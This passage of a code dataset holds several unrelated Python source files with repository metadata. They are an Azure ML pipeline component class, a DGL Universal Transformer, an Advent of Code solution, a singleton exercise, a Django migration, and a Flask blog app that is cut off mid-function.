= None,\n tags: Optional[Dict] = None,\n display_name: Optional[str] = None,\n inputs: Optional[Dict] = None,\n outputs: Optional[Dict] = None,\n jobs: Optional[Dict[str, BaseNode]] = None,\n is_deterministic: Optional[bool] = None,\n **kwargs,\n ) -> None:\n kwargs[COMPONENT_TYPE] = NodeType.PIPELINE\n super().__init__(\n name=name,\n version=version,\n description=description,\n tags=tags,\n display_name=display_name,\n inputs=inputs,\n outputs=outputs,\n is_deterministic=is_deterministic,\n **kwargs,\n )\n self._jobs = self._process_jobs(jobs) if jobs else {}\n # for telemetry\n self._job_types, self._job_sources = self._get_job_type_and_source()\n # Private support: create pipeline component from pipeline job\n self._source_job_id = kwargs.pop(\"source_job_id\", None)\n # TODO: set anonymous hash for reuse\n\n def _process_jobs(self, jobs: Dict[str, BaseNode]) -> Dict[str, BaseNode]:\n \"\"\"Process and validate jobs.\n\n :param jobs: A map of node name to node\n :type jobs: Dict[str, BaseNode]\n :return: The processed jobs\n :rtype: Dict[str, BaseNode]\n \"\"\"\n # Remove swept Command\n node_names_to_skip = []\n for node_name, job_instance in jobs.items():\n if isinstance(job_instance, Command) and job_instance._swept is True:\n node_names_to_skip.append(node_name)\n\n for key in node_names_to_skip:\n del jobs[key]\n\n # Set path and validate node type.\n for _, job_instance in jobs.items():\n if isinstance(job_instance, BaseNode):\n job_instance._set_base_path(self.base_path)\n\n if not isinstance(job_instance, (BaseNode, AutoMLJob, ControlFlowNode)):\n msg = f\"Not supported pipeline job type: {type(job_instance)}\"\n raise ValidationException(\n message=msg,\n no_personal_data_message=msg,\n target=ErrorTarget.PIPELINE,\n error_category=ErrorCategory.USER_ERROR,\n )\n return jobs\n\n def _customized_validate(self) -> MutableValidationResult:\n \"\"\"Validate pipeline component structure.\n\n :return: The validation result\n :rtype: MutableValidationResult\n \"\"\"\n validation_result = super(PipelineComponent, self)._customized_validate()\n\n # Validate inputs\n for input_name, input_value in self.inputs.items():\n if input_value.type is None:\n validation_result.append_error(\n yaml_path=\"inputs.{}\".format(input_name),\n message=\"Parameter type unknown, please add type annotation or specify input default value.\",\n error_code=ValidationErrorCode.PARAMETER_TYPE_UNKNOWN,\n )\n\n # Validate all nodes\n for node_name, node in self.jobs.items():\n if isinstance(node, BaseNode):\n # Node inputs will be validated.\n validation_result.merge_with(node._validate(), \"jobs.{}\".format(node_name))\n if isinstance(node.component, Component):\n # Validate binding if not remote resource.\n validation_result.merge_with(self._validate_binding_inputs(node))\n elif isinstance(node, AutoMLJob):\n pass\n elif isinstance(node, ControlFlowNode):\n # Validate control flow node.\n validation_result.merge_with(node._validate(), \"jobs.{}\".format(node_name))\n else:\n validation_result.append_error(\n yaml_path=\"jobs.{}\".format(node_name),\n message=f\"Not supported pipeline job type: {type(node)}\",\n )\n\n return validation_result\n\n def _validate_compute_is_set(self, *, parent_node_name=None) -> MutableValidationResult:\n \"\"\"Validate compute in pipeline component.\n\n This function will only be called from pipeline_job._validate_compute_is_set\n when both of the pipeline_job.compute and pipeline_job.settings.default_compute is None.\n Rules:\n - For pipeline node: will call node._component._validate_compute_is_set to validate node compute in sub graph.\n - For general node:\n - If _skip_required_compute_missing_validation is True, validation will be skipped.\n - All the rest of cases without compute will add compute not set error to validation result.\n\n :return: The validation result\n :rtype: MutableValidationResult\n \"\"\"\n\n # Note: do not put this into customized validate, as we would like call\n # this from pipeline_job._validate_compute_is_set\n validation_result = self._create_empty_validation_result()\n no_compute_nodes = []\n parent_node_name = parent_node_name if parent_node_name else \"\"\n for node_name, node in self.jobs.items():\n full_node_name = f\"{parent_node_name}{node_name}.jobs.\"\n if node.type == NodeType.PIPELINE and isinstance(node._component, PipelineComponent):\n validation_result.merge_with(node._component._validate_compute_is_set(parent_node_name=full_node_name))\n continue\n if isinstance(node, BaseNode) and node._skip_required_compute_missing_validation:\n continue\n if has_attr_safe(node, \"compute\") and node.compute is None:\n no_compute_nodes.append(node_name)\n\n for node_name in no_compute_nodes:\n validation_result.append_error(\n yaml_path=f\"jobs.{parent_node_name}{node_name}.compute\",\n message=\"Compute not set\",\n )\n return validation_result\n\n def _get_input_binding_dict(self, node: BaseNode) -> Tuple[dict, dict]:\n \"\"\"Return the input binding dict for each node.\n\n :param node: The node\n :type node: BaseNode\n :return: A 2-tuple of (binding_dict, optional_binding_in_expression_dict)\n :rtype: Tuple[dict, dict]\n \"\"\"\n # pylint: disable=too-many-nested-blocks\n binding_inputs = node._build_inputs()\n # Collect binding relation dict {'pipeline_input': ['node_input']}\n binding_dict, optional_binding_in_expression_dict = {}, {}\n for component_input_name, component_binding_input in binding_inputs.items():\n if isinstance(component_binding_input, PipelineExpression):\n for pipeline_input_name in component_binding_input._inputs.keys():\n if pipeline_input_name not in self.inputs:\n continue\n if pipeline_input_name not in binding_dict:\n binding_dict[pipeline_input_name] = []\n binding_dict[pipeline_input_name].append(component_input_name)\n if pipeline_input_name not in optional_binding_in_expression_dict:\n optional_binding_in_expression_dict[pipeline_input_name] = []\n optional_binding_in_expression_dict[pipeline_input_name].append(pipeline_input_name)\n else:\n if isinstance(component_binding_input, Input):\n component_binding_input = component_binding_input.path\n if is_data_binding_expression(component_binding_input, [\"parent\"]):\n # data binding may have more than one PipelineInput now\n for pipeline_input_name in PipelineExpression.parse_pipeline_inputs_from_data_binding(\n component_binding_input\n ):\n if pipeline_input_name not in self.inputs:\n continue\n if pipeline_input_name not in binding_dict:\n binding_dict[pipeline_input_name] = []\n binding_dict[pipeline_input_name].append(component_input_name)\n # for data binding expression \"${{parent.inputs.pipeline_input}}\", it should not be optional\n if len(component_binding_input.replace(\"${{parent.inputs.\" + pipeline_input_name + \"}}\", \"\")):\n if pipeline_input_name not in optional_binding_in_expression_dict:\n optional_binding_in_expression_dict[pipeline_input_name] = []\n optional_binding_in_expression_dict[pipeline_input_name].append(pipeline_input_name)\n return binding_dict, optional_binding_in_expression_dict\n\n def _validate_binding_inputs(self, node: BaseNode) -> MutableValidationResult:\n \"\"\"Validate pipeline binding inputs and return all used pipeline input names.\n\n Mark input as optional if all binding is optional and optional not set. Raise error if pipeline input is\n optional but link to required inputs.\n\n :param node: The node to validate\n :type node: BaseNode\n :return: The validation result\n :rtype: MutableValidationResult\n \"\"\"\n component_definition_inputs = {}\n # Add flattened group input into definition inputs.\n # e.g. Add {'group_name.item': PipelineInput} for {'group_name': GroupInput}\n for name, val in node.component.inputs.items():\n if isinstance(val, GroupInput):\n component_definition_inputs.update(val.flatten(group_parameter_name=name))\n component_definition_inputs[name] = val\n # Collect binding relation dict {'pipeline_input': ['node_input']}\n validation_result = self._create_empty_validation_result()\n binding_dict, optional_binding_in_expression_dict = self._get_input_binding_dict(node)\n\n # Validate links required and optional\n for pipeline_input_name, binding_inputs in binding_dict.items():\n pipeline_input = self.inputs[pipeline_input_name]\n required_bindings = []\n for name in binding_inputs:\n # not check optional/required for pipeline input used in pipeline expression\n if name in optional_binding_in_expression_dict.get(pipeline_input_name, []):\n continue\n if name in component_definition_inputs and component_definition_inputs[name].optional is not True:\n required_bindings.append(f\"{node.name}.inputs.{name}\")\n if pipeline_input.optional is None and not required_bindings:\n # Set input as optional if all binding is optional and optional not set.\n pipeline_input.optional = True\n pipeline_input._is_inferred_optional = True\n elif pipeline_input.optional is True and required_bindings:\n if pipeline_input._is_inferred_optional:\n # Change optional=True to None if is inferred by us\n pipeline_input.optional = None\n else:\n # Raise exception if pipeline input is optional set by user but link to required inputs.\n validation_result.append_error(\n yaml_path=\"inputs.{}\".format(pipeline_input._port_name),\n message=f\"Pipeline optional Input binding to required inputs: {required_bindings}\",\n )\n return validation_result\n\n def _get_job_type_and_source(self) -> Tuple[Dict[str, int], Dict[str, int]]:\n \"\"\"Get job types and sources for telemetry.\n\n :return: A 2-tuple of\n * A map of job type to the number of occurrences\n * A map of job source to the number of occurrences\n :rtype: Tuple[Dict[str, int], Dict[str, int]]\n \"\"\"\n job_types, job_sources = [], []\n for job in self.jobs.values():\n job_types.append(job.type)\n if isinstance(job, BaseNode):\n job_sources.append(job._source)\n elif isinstance(job, AutoMLJob):\n # Consider all automl_job has builder type for now,\n # as it's not easy to distinguish their source(yaml/builder).\n job_sources.append(ComponentSource.BUILDER)\n else:\n # Fall back to CLASS\n job_sources.append(ComponentSource.CLASS)\n return dict(Counter(job_types)), dict(Counter(job_sources))\n\n @property\n def jobs(self) -> Dict[str, BaseNode]:\n \"\"\"Return a dictionary from component variable name to component object.\n\n :return: Dictionary mapping component variable names to component objects.\n :rtype: Dict[str, ~azure.ai.ml.entities._builders.BaseNode]\n \"\"\"\n return self._jobs\n\n def _get_anonymous_hash(self) -> str:\n \"\"\"Get anonymous hash for pipeline component.\n\n :return: The anonymous hash of the pipeline component\n :rtype: str\n \"\"\"\n # ideally we should always use rest object to generate hash as it's the same as\n # what we send to server-side, but changing the hash function will break reuse of\n # existing components except for command component (hash result is the same for\n # command component), so we just use rest object to generate hash for pipeline component,\n # which doesn't have reuse issue.\n component_interface_dict = self._to_rest_object().properties.component_spec\n hash_value = hash_dict(\n component_interface_dict,\n keys_to_omit=[\n # omit name since anonymous component will have same name\n \"name\",\n # omit _source since it doesn't impact component's uniqueness\n \"_source\",\n # omit id since it will be set after component is registered\n \"id\",\n # omit version since it will be set to this hash later\n \"version\",\n ],\n )\n return hash_value\n\n @classmethod\n def _load_from_rest_pipeline_job(cls, data: Dict):\n # TODO: refine this?\n # Set type as None here to avoid schema validation failed\n definition_inputs = {p: {\"type\": None} for p in data.get(\"inputs\", {}).keys()}\n definition_outputs = {p: {\"type\": None} for p in data.get(\"outputs\", {}).keys()}\n return PipelineComponent(\n display_name=data.get(\"display_name\"),\n description=data.get(\"description\"),\n inputs=definition_inputs,\n outputs=definition_outputs,\n jobs=data.get(\"jobs\"),\n _source=ComponentSource.REMOTE_WORKSPACE_JOB,\n )\n\n @classmethod\n def _resolve_sub_nodes(cls, rest_jobs):\n from azure.ai.ml.entities._job.pipeline._load_component import pipeline_node_factory\n\n sub_nodes = {}\n if rest_jobs is None:\n return sub_nodes\n for node_name, node in rest_jobs.items():\n # TODO: Remove this ad-hoc fix after unified arm id format in object\n component_id = node.get(\"componentId\", \"\")\n if isinstance(component_id, str) and re.match(ASSET_ARM_ID_REGEX_FORMAT, component_id):\n node[\"componentId\"] = component_id[len(ARM_ID_PREFIX) :]\n if not LoopNode._is_loop_node_dict(node):\n # skip resolve LoopNode first since it may reference other nodes\n # use node factory instead of BaseNode._from_rest_object here as AutoMLJob is not a BaseNode\n sub_nodes[node_name] = pipeline_node_factory.load_from_rest_object(obj=node)\n for node_name, node in rest_jobs.items():\n if LoopNode._is_loop_node_dict(node):\n # resolve LoopNode after all other nodes are resolved\n sub_nodes[node_name] = pipeline_node_factory.load_from_rest_object(obj=node, pipeline_jobs=sub_nodes)\n return sub_nodes\n\n @classmethod\n def _create_schema_for_validation(cls, context) -> Union[PathAwareSchema, Schema]:\n return PipelineComponentSchema(context=context)\n\n @classmethod\n def _get_skip_fields_in_schema_validation(cls) -> typing.List[str]:\n # jobs validations are done in _customized_validate()\n return [\"jobs\"]\n\n @classmethod\n def _check_ignored_keys(cls, obj: object) -> List[str]:\n \"\"\"Return ignored keys in obj as a pipeline component when its value be set.\n\n :param obj: The object to examine\n :type obj: object\n :return: List of keys to ignore\n :rtype: List[str]\n \"\"\"\n examine_mapping = {\n \"compute\": lambda val: val is not None,\n \"settings\": lambda val: val is not None and any(v is not None for v in val._to_dict().values()),\n }\n # Avoid new attr added by use `try_get_non...` instead of `hasattr` or `getattr` directly.\n return [k for k, has_set in examine_mapping.items() if has_set(try_get_non_arbitrary_attr(obj, k))]\n\n def _get_telemetry_values(self, *args, **kwargs):\n telemetry_values = super()._get_telemetry_values()\n telemetry_values.update(\n {\n \"source\": self._source,\n \"node_count\": len(self.jobs),\n \"node_type\": json.dumps(self._job_types),\n \"node_source\": json.dumps(self._job_sources),\n }\n )\n return telemetry_values\n\n @classmethod\n def _from_rest_object_to_init_params(cls, obj: ComponentVersion) -> Dict:\n # Pop jobs to avoid it goes with schema load\n jobs = obj.properties.component_spec.pop(\"jobs\", None)\n init_params_dict = super()._from_rest_object_to_init_params(obj)\n if jobs:\n try:\n init_params_dict[\"jobs\"] = PipelineComponent._resolve_sub_nodes(jobs)\n except Exception as e: # pylint: disable=broad-except\n # Skip parse jobs if error exists.\n # TODO: https://msdata.visualstudio.com/Vienna/_workitems/edit/2052262\n module_logger.debug(\"Parse pipeline component jobs failed with: %s\", e)\n return init_params_dict\n\n def _to_dict(self) -> Dict:\n return {**self._other_parameter, **super()._to_dict()}\n\n def _build_rest_component_jobs(self) -> Dict[str, dict]:\n \"\"\"Build pipeline component jobs to rest.\n\n :return: A map of job name to rest objects\n :rtype: Dict[str, dict]\n \"\"\"\n # Build the jobs to dict\n rest_component_jobs = {}\n for job_name, job in self.jobs.items():\n if isinstance(job, (BaseNode, ControlFlowNode)):\n rest_node_dict = job._to_rest_object()\n elif isinstance(job, AutoMLJob):\n rest_node_dict = json.loads(json.dumps(job._to_dict(inside_pipeline=True)))\n else:\n msg = f\"Non supported job type in Pipeline jobs: {type(job)}\"\n raise ValidationException(\n message=msg,\n no_personal_data_message=msg,\n target=ErrorTarget.PIPELINE,\n error_category=ErrorCategory.USER_ERROR,\n )\n rest_component_jobs[job_name] = rest_node_dict\n return rest_component_jobs\n\n def _to_rest_object(self) -> ComponentVersion:\n \"\"\"Check ignored keys and return rest object.\n\n :return: The component version\n :rtype: ComponentVersion\n \"\"\"\n ignored_keys = self._check_ignored_keys(self)\n if ignored_keys:\n module_logger.warning(\"%s ignored on pipeline component %r.\", ignored_keys, self.name)\n component = self._to_dict()\n # add source type to component rest object\n component[\"_source\"] = self._source\n component[\"jobs\"] = self._build_rest_component_jobs()\n component[\"sourceJobId\"] = self._source_job_id\n if self._intellectual_property:\n # hack while full pass through supported is worked on for IPP fields\n component.pop(\"intellectual_property\")\n component[\"intellectualProperty\"] = self._intellectual_property._to_rest_object().serialize()\n properties = ComponentVersionProperties(\n component_spec=component,\n description=self.description,\n is_anonymous=self._is_anonymous,\n properties=self.properties,\n tags=self.tags,\n )\n result = ComponentVersion(properties=properties)\n result.name = self.name\n return result\n\n def __str__(self):\n try:\n return self._to_yaml()\n except BaseException: # pylint: disable=broad-except\n return super(PipelineComponent, self).__str__()\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/ml/azure-ai-ml/azure/ai/ml/entities/_component/pipeline_component.py","file_name":"pipeline_component.py","file_ext":"py","file_size_in_byte":23396,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"71587292321","text":"from .attention import *\nfrom .layers import *\nfrom .functions import *\nfrom .embedding import *\nimport dgl.function as fn\nimport torch as th\nimport torch.nn.init as INIT\n\n\nclass UEncoder(nn.Module):\n def __init__(self, layer):\n super(UEncoder, self).__init__()\n self.layer = layer\n self.norm = LayerNorm(layer.size)\n\n def pre_func(self, fields=\"qkv\"):\n layer = self.layer\n\n def func(nodes):\n x = nodes.data[\"x\"]\n norm_x = layer.sublayer[0].norm(x)\n return layer.self_attn.get(norm_x, fields=fields)\n\n return func\n\n def post_func(self):\n layer = self.layer\n\n def func(nodes):\n x, wv, z = nodes.data[\"x\"], nodes.data[\"wv\"], nodes.data[\"z\"]\n o = layer.self_attn.get_o(wv / z)\n x = x + layer.sublayer[0].dropout(o)\n x = layer.sublayer[1](x, layer.feed_forward)\n return {\"x\": x}\n\n return func\n\n\nclass UDecoder(nn.Module):\n def __init__(self, layer):\n super(UDecoder, self).__init__()\n self.layer = layer\n self.norm = LayerNorm(layer.size)\n\n def pre_func(self, fields=\"qkv\", l=0):\n layer = self.layer\n\n def func(nodes):\n x = nodes.data[\"x\"]\n if fields == \"kv\":\n norm_x = x\n else:\n norm_x = layer.sublayer[l].norm(x)\n return layer.self_attn.get(norm_x, fields)\n\n return func\n\n def post_func(self, l=0):\n layer = self.layer\n\n def func(nodes):\n x, wv, z = nodes.data[\"x\"], nodes.data[\"wv\"], nodes.data[\"z\"]\n o = layer.self_attn.get_o(wv / z)\n x = x + layer.sublayer[l].dropout(o)\n if l == 1:\n x = layer.sublayer[2](x, layer.feed_forward)\n return {\"x\": x}\n\n return func\n\n\nclass HaltingUnit(nn.Module):\n halting_bias_init = 1.0\n\n def __init__(self, dim_model):\n super(HaltingUnit, self).__init__()\n self.linear = nn.Linear(dim_model, 1)\n self.norm = LayerNorm(dim_model)\n INIT.constant_(self.linear.bias, self.halting_bias_init)\n\n def forward(self, x):\n return th.sigmoid(self.linear(self.norm(x)))\n\n\nclass UTransformer(nn.Module):\n \"Universal Transformer(https://arxiv.org/pdf/1807.03819.pdf) with ACT(https://arxiv.org/pdf/1603.08983.pdf).\"\n MAX_DEPTH = 8\n thres = 0.99\n act_loss_weight = 0.01\n\n def __init__(\n self,\n encoder,\n decoder,\n src_embed,\n tgt_embed,\n pos_enc,\n time_enc,\n generator,\n h,\n d_k,\n ):\n super(UTransformer, self).__init__()\n self.encoder, self.decoder = encoder, decoder\n self.src_embed, self.tgt_embed = src_embed, tgt_embed\n self.pos_enc, self.time_enc = pos_enc, time_enc\n self.halt_enc = HaltingUnit(h * d_k)\n self.halt_dec = HaltingUnit(h * d_k)\n self.generator = generator\n self.h, self.d_k = h, d_k\n self.reset_stat()\n\n def reset_stat(self):\n self.stat = [0] * (self.MAX_DEPTH + 1)\n\n def step_forward(self, nodes):\n x = nodes.data[\"x\"]\n step = nodes.data[\"step\"]\n pos = nodes.data[\"pos\"]\n return {\n \"x\": self.pos_enc.dropout(\n x + self.pos_enc(pos.view(-1)) + self.time_enc(step.view(-1))\n ),\n \"step\": step + 1,\n }\n\n def halt_and_accum(self, name, end=False):\n \"field: 'enc' or 'dec'\"\n halt = self.halt_enc if name == \"enc\" else self.halt_dec\n thres = self.thres\n\n def func(nodes):\n p = halt(nodes.data[\"x\"])\n sum_p = nodes.data[\"sum_p\"] + p\n active = (sum_p < thres) & (1 - end)\n _continue = active.float()\n r = nodes.data[\"r\"] * (1 - _continue) + (1 - sum_p) * _continue\n s = (\n nodes.data[\"s\"]\n + ((1 - _continue) * r + _continue * p) * nodes.data[\"x\"]\n )\n return {\"p\": p, \"sum_p\": sum_p, \"r\": r, \"s\": s, \"active\": active}\n\n return func\n\n def propagate_attention(self, g, eids):\n # Compute attention score\n g.apply_edges(src_dot_dst(\"k\", \"q\", \"score\"), eids)\n g.apply_edges(scaled_exp(\"score\", np.sqrt(self.d_k)), eids)\n # Send weighted values to target nodes\n g.send_and_recv(\n eids,\n [fn.u_mul_e(\"v\", \"score\", \"v\"), fn.copy_e(\"score\", \"score\")],\n [fn.sum(\"v\", \"wv\"), fn.sum(\"score\", \"z\")],\n )\n\n def update_graph(self, g, eids, pre_pairs, post_pairs):\n \"Update the node states and edge states of the graph.\"\n # Pre-compute queries and key-value pairs.\n for pre_func, nids in pre_pairs:\n g.apply_nodes(pre_func, nids)\n self.propagate_attention(g, eids)\n # Further calculation after attention mechanism\n for post_func, nids in post_pairs:\n g.apply_nodes(post_func, nids)\n\n def forward(self, graph):\n g = graph.g\n N, E = graph.n_nodes, graph.n_edges\n nids, eids = graph.nids, graph.eids\n\n # embed & pos\n g.nodes[nids[\"enc\"]].data[\"x\"] = self.src_embed(graph.src[0])\n g.nodes[nids[\"dec\"]].data[\"x\"] = self.tgt_embed(graph.tgt[0])\n g.nodes[nids[\"enc\"]].data[\"pos\"] = graph.src[1]\n g.nodes[nids[\"dec\"]].data[\"pos\"] = graph.tgt[1]\n\n # init step\n device = next(self.parameters()).device\n g.ndata[\"s\"] = th.zeros(\n N, self.h * self.d_k, dtype=th.float, device=device\n ) # accumulated state\n g.ndata[\"p\"] = th.zeros(\n N, 1, dtype=th.float, device=device\n ) # halting prob\n g.ndata[\"r\"] = th.ones(N, 1, dtype=th.float, device=device) # remainder\n g.ndata[\"sum_p\"] = th.zeros(\n N, 1, dtype=th.float, device=device\n ) # sum of pondering values\n g.ndata[\"step\"] = th.zeros(N, 1, dtype=th.long, device=device) # step\n g.ndata[\"active\"] = th.ones(\n N, 1, dtype=th.uint8, device=device\n ) # active\n\n for step in range(self.MAX_DEPTH):\n pre_func = self.encoder.pre_func(\"qkv\")\n post_func = self.encoder.post_func()\n nodes = g.filter_nodes(\n lambda v: v.data[\"active\"].view(-1), nids[\"enc\"]\n )\n if len(nodes) == 0:\n break\n edges = g.filter_edges(\n lambda e: e.dst[\"active\"].view(-1), eids[\"ee\"]\n )\n end = step == self.MAX_DEPTH - 1\n self.update_graph(\n g,\n edges,\n [(self.step_forward, nodes), (pre_func, nodes)],\n [(post_func, nodes), (self.halt_and_accum(\"enc\", end), nodes)],\n )\n\n g.nodes[nids[\"enc\"]].data[\"x\"] = self.encoder.norm(\n g.nodes[nids[\"enc\"]].data[\"s\"]\n )\n\n for step in range(self.MAX_DEPTH):\n pre_func = self.decoder.pre_func(\"qkv\")\n post_func = self.decoder.post_func()\n nodes = g.filter_nodes(\n lambda v: v.data[\"active\"].view(-1), nids[\"dec\"]\n )\n if len(nodes) == 0:\n break\n edges = g.filter_edges(\n lambda e: e.dst[\"active\"].view(-1), eids[\"dd\"]\n )\n self.update_graph(\n g,\n edges,\n [(self.step_forward, nodes), (pre_func, nodes)],\n [(post_func, nodes)],\n )\n\n pre_q = self.decoder.pre_func(\"q\", 1)\n pre_kv = self.decoder.pre_func(\"kv\", 1)\n post_func = self.decoder.post_func(1)\n nodes_e = nids[\"enc\"]\n edges = g.filter_edges(\n lambda e: e.dst[\"active\"].view(-1), eids[\"ed\"]\n )\n end = step == self.MAX_DEPTH - 1\n self.update_graph(\n g,\n edges,\n [(pre_q, nodes), (pre_kv, nodes_e)],\n [(post_func, nodes), (self.halt_and_accum(\"dec\", end), nodes)],\n )\n\n g.nodes[nids[\"dec\"]].data[\"x\"] = self.decoder.norm(\n g.nodes[nids[\"dec\"]].data[\"s\"]\n )\n act_loss = th.mean(g.ndata[\"r\"]) # ACT loss\n\n self.stat[0] += N\n for step in range(1, self.MAX_DEPTH + 1):\n self.stat[step] += th.sum(g.ndata[\"step\"] >= step).item()\n\n return (\n self.generator(g.ndata[\"x\"][nids[\"dec\"]]),\n act_loss * self.act_loss_weight,\n )\n\n def infer(self, *args, **kwargs):\n raise NotImplementedError\n\n\ndef make_universal_model(\n src_vocab, tgt_vocab, dim_model=512, dim_ff=2048, h=8, dropout=0.1\n):\n c = copy.deepcopy\n attn = MultiHeadAttention(h, dim_model)\n ff = PositionwiseFeedForward(dim_model, dim_ff)\n pos_enc = PositionalEncoding(dim_model, dropout)\n time_enc = PositionalEncoding(dim_model, dropout)\n encoder = UEncoder(EncoderLayer((dim_model), c(attn), c(ff), dropout))\n decoder = UDecoder(\n DecoderLayer((dim_model), c(attn), c(attn), c(ff), dropout)\n )\n src_embed = Embeddings(src_vocab, dim_model)\n tgt_embed = Embeddings(tgt_vocab, dim_model)\n generator = Generator(dim_model, tgt_vocab)\n model = UTransformer(\n encoder,\n decoder,\n src_embed,\n tgt_embed,\n pos_enc,\n time_enc,\n generator,\n h,\n dim_model // h,\n )\n # xavier init\n for p in model.parameters():\n if p.dim() > 1:\n INIT.xavier_uniform_(p)\n return model\n","repo_name":"dmlc/dgl","sub_path":"examples/pytorch/transformer/modules/act.py","file_name":"act.py","file_ext":"py","file_size_in_byte":9549,"program_lang":"python","lang":"en","doc_type":"code","stars":12455,"dataset":"github-code","pt":"54"} +{"seq_id":"7879484770","text":"\"\"\" Advent of code 2021 day 09 / 2 \"\"\"\n\nfrom os import path\nimport math\n\npos = [(-1, 0), (1, 0), (0, -1), (0, 1)]\n\n\nclass Code(object):\n def __init__(self, lines):\n self.lines = lines\n self.height = len(lines)\n self.width = len(lines[0])\n\n def fillpos(self, y, x):\n pl = []\n for (dy, dx) in pos:\n ny = dy+y\n nx = dx + x\n np = (ny, nx)\n if ny >= 0 and ny < self.height and nx >= 0 and nx < self.width:\n pl.append(np)\n return pl\n\n def lowpoints(self):\n lst = []\n\n for y, row in enumerate(self.lines):\n for x, c in enumerate(row):\n # print(c)\n shouldadd = [\n self.lines[ny][nx] > c\n for [ny, nx]\n in self.fillpos(y, x)\n ]\n if all(shouldadd):\n # print(c)\n lst.append((y, x))\n return lst\n\n def basin(self, y, x):\n res = 0\n visited = set()\n pl = self.fillpos(y, x)\n while len(pl) > 0:\n nc = pl.pop()\n [ny, nx] = nc\n # print(\"visit\", nc)\n if nc in visited:\n # print(\"seen\", nc)\n continue\n if self.lines[ny][nx] == 9:\n # print(\"wall\", nc)\n continue\n res += 1\n visited.add(nc)\n newcoords = self.fillpos(ny, nx)\n pl += newcoords\n # print(\"added\", res, newcoords, pl)\n # print(\"finished\", res)\n return res\n\n def solve(self):\n # print(self.lines)\n lp = self.lowpoints()\n sizes = [self.basin(y, x) for [y, x] in lp]\n return math.prod(sorted(sizes, reverse=True)[:3])\n\n\ndef preprocess(raw_data):\n # pattern = re.compile(r'(\\w+) (\\d+)')\n processed_data = []\n for line in raw_data.split(\"\\n\"):\n # match = re.match(pattern, line)\n # data = [match.group(1), match.group(2)]\n data = line\n processed_data.append(list(map(int, data)))\n return processed_data\n\n\ndef solution(data):\n \"\"\" Solution to the problem \"\"\"\n lines = preprocess(data)\n solver = Code(lines)\n return solver.solve()\n\n\nif __name__ == \"__main__\":\n with(open(path.join(path.dirname(__file__), 'input.txt'), 'r')) as input_file:\n print(solution(input_file.read()))\n","repo_name":"budavariam/advent_of_code","sub_path":"2021/09_2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"73202720481","text":"# -*- coding:utf-8\n\nclass User(object):\n\t__instance = None\n\n\t@classmethod\n\tdef get_Instance(cls,name):\n\t\tif not cls.__instance: # 如果 __instance 为None\n\t\t\tcls.__instance = User(name)\n\t\t\tprint(\"11111\")\n\t\treturn cls.__instance\n\n#u1 = User('zs')\n#u2 = User('ls')\nu1 = User.get_instance()\nu2 = User.get_instance()\nprint(u1 == u2) # ==判断表达式如果返回True, 这两个对象是一个对象, 并且内存地址相同\nprint(\"u1对象的内存地址: %s\\nu2对象的内存地址: %s\" % (id(u1), id(u2)))\n","repo_name":"CoderSahara/Python_Study","sub_path":"第8天/02-单例模式1.py","file_name":"02-单例模式1.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"36700085591","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('survey', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='autum',\n name='name',\n field=models.CharField(verbose_name='客户姓名', max_length=12),\n ),\n ]\n","repo_name":"j-iNFINITE/ICS","sub_path":"survey/migrations/0002_auto_20151113_1617.py","file_name":"0002_auto_20151113_1617.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3434647192","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime\nimport os\n\n\nSQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL').replace('postgres', 'postgresql')\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = SQLALCHEMY_DATABASE_URI\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n\nclass Article(db.Model):\n __tablename__ = 'Articles'\n\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(50), nullable=False)\n description = db.Column(db.String(250), nullable=False)\n content = db.Column(db.Text, nullable=False)\n date = db.Column(db.DateTime, default=datetime.utcnow)\n\n comments = db.relationship('Comment', backref='article', lazy=True)\n\n def __init__(self, title, description, content):\n self.title = title\n self.description = description\n self.content = content\n\n def __repr__(self):\n return '<Article %r>' % self.id\n\n\nclass Comment(db.Model):\n __tablename__ = 'Comments'\n\n id = db.Column(db.Integer, primary_key=True)\n content = db.Column(db.String(250), nullable=False)\n\n article_id = db.Column(db.Integer, db.ForeignKey('Articles.id', ondelete='CASCADE'))\n\n def __init__(self, content):\n self.content = content\n\n def __repr__(self):\n return '<Comment %r>' % self.id\n\n\n\n@app.route('/')\n@app.route('/home')\ndef index():\n return render_template('index.html')\n\n\n# articles\n\n@app.route('/articles')\ndef articles():\n articles = Article.query.order_by(Article.date.desc()).all()\n\n return render_template('articles.html', articles=articles)\n\n\n@app.route('/create-article', methods=['POST', 'GET'])\ndef create_article():\n if request.method == 'POST':\n title = request.form['title']\n description = request.form['description']\n content = request.form['content']\n\n if not title or not description or not content:\n return 'Fields cannot be empty!'\n \n article = Article(title, description, content)\n\n db.session.add(article)\n db.session.commit()\n \n return redirect('/articles')\n\n return render_template('create-article.html')\n\n\n@app.route('/articles/<int:id>')\ndef get_article(id):\n article = Article.query.filter_by(id=id).first()\n\n if not article:\n return 'Object not found!!'\n\n return render_template('get-article.html', article=article)\n\n\n@app.route('/articles/<int:id>/update', methods=['POST', 'GET'])\ndef update_article(id):\n article = Article.query.filter_by(id=id).first()\n\n if request.method == 'POST':\n title = request.form['title']\n description = request.form['description']\n content = request.form['content']\n\n if not title or not description or not content:\n return 'Fields cannot be empty!!'\n \n article.title = title\n article.descripion = description\n article.content = content\n\n db.session.commit()\n\n return redirect('/articles')\n\n return render_template('update-article.html', article=article)\n\n\n@app.route('/articles/<int:id>/delete')\ndef delete_article(id):\n article = Article.query.filter_by(id=id).first()\n\n if article:\n 